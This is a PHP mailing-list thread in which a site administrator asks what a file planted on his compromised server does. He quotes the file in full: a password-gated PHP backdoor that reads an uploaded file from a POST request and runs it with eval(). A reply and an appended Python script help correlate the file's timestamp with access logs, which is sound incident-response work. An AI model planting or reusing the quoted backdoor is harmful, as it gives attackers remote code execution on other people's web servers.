Re: Re: Hack question

On Fri, Apr 18, 2008 at 12:22 PM, Al <news@xxxxxxxxxxxxx> wrote:
> I'm continuing to work on this.
>
>  One thing that seems obvious. The code executes the script code, using
> eval(), directly from the /tmp dir. So the usual security tests we do prior
> to using move_uploaded_file() are useless.
>
>
>
>  Al wrote:
>
> > I'm still fighting my hack problem on one of my servers. Can anyone help
> me figure out what's the purpose of this code.  The hack places this file in
> numerous dirs on the site, I assume using a php script because the owner is
> "nobody".
> >
> > I can sort of figure out what it is doing, but I can't figure out what the
> hacker is using it for.
> >
> > Incidentally, I've changed all passwords and restricted ftp to two people.
> I see no sign that any code is written by the site owner, i.e., ftp. And,
> I've looked carefully for suspect php files.
> >
> >
> > > <?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) {
> echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo
> "<pre>"; testdata('start'); if
> (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code =
> @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){
> eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); };
> testdata('end'); echo "</pre>"; ?>
> > >
> >
> >
> > > <?php error_reporting(1);
> > > global $HTTP_SERVER_VARS;
> > > function say($t)
> > > {
> > >    echo "$t\n";
> > > } ;
> > > function testdata($t)
> > > {
> > >    say(md5("testdata_$t"));
> > > } ;
> > > echo "<pre>";
> > > testdata('start');
> > > if (md5($_POST["p"]) == "aace99428c50dbe965acc93f3f275cd3")
> > > {
> > >    if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
> $HTTP_POST_FILES["f"]["size"]))
> > >    {
> > >        eval($code);
> > >    }     else
> > >    {
> > >        testdata('f');
> > >    } ;
> > > } else
> > > {
> > >    testdata('pass');
> > > } ;
> > > testdata('end');
> > > echo "</pre>";
> > > ?>
> > >
> >
>
>  --
>  PHP General Mailing List (http://www.php.net/)
>  To unsubscribe, visit: http://www.php.net/unsub.php
>
>

Maybe you can look at the file time on the script in /tmp and look at
server logs around that same time to see if there is any hint of where
it might have come from.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
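
The correlation suggested in the reply above, as an added example that is not part of the original thread: take the modification time of one of the dropped files and list the POST requests logged within a short window around it. It assumes Apache common/combined access-log format; the log lines, IP addresses, paths and timestamp below are constructed sample data.

```python
import os
import re
from datetime import datetime, timedelta, timezone

# Prefix of Apache common/combined log lines (assumed format):
# host ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

def file_mtime(path):
    """Modification time of a dropped file as an aware UTC datetime."""
    return datetime.fromtimestamp(os.stat(path).st_mtime, tz=timezone.utc)

def parse_line(line):
    """Parse one access-log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return {"host": m["host"], "ts": ts, "method": m["method"],
            "path": m["path"], "status": int(m["status"])}

def requests_near(log_lines, when, window=timedelta(minutes=2), methods=("POST",)):
    """Requests within `window` of `when`, closest first. The file in this
    thread is driven by POST uploads, so POST is the default filter."""
    hits = []
    for line in log_lines:
        entry = parse_line(line)
        if entry and entry["method"] in methods and abs(entry["ts"] - when) <= window:
            hits.append(entry)
    return sorted(hits, key=lambda e: abs(e["ts"] - when))

# Constructed sample data (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [18/Apr/2008:03:14:02 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [18/Apr/2008:03:15:40 +0000] "POST /gallery/upload.php HTTP/1.1" 200 312',
    '192.0.2.44 - - [18/Apr/2008:03:15:58 +0000] "POST /images/cache/x.php HTTP/1.1" 200 98',
    '198.51.100.7 - - [18/Apr/2008:09:30:11 +0000] "POST /contact.php HTTP/1.1" 200 640',
    'garbage line',
]
SAMPLE_MTIME = datetime(2008, 4, 18, 3, 15, 41, tzinfo=timezone.utc)

if __name__ == "__main__":
    # On a real host: when = file_mtime("/path/to/dropped/file.php")
    for e in requests_near(SAMPLE_LOG, SAMPLE_MTIME):
        print(e["ts"].isoformat(), e["host"], e["method"], e["path"], e["status"])
```

The modification time can be reset by whoever wrote the file, so compare it with `st_ctime` from the same `os.stat()` call before trusting the window.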

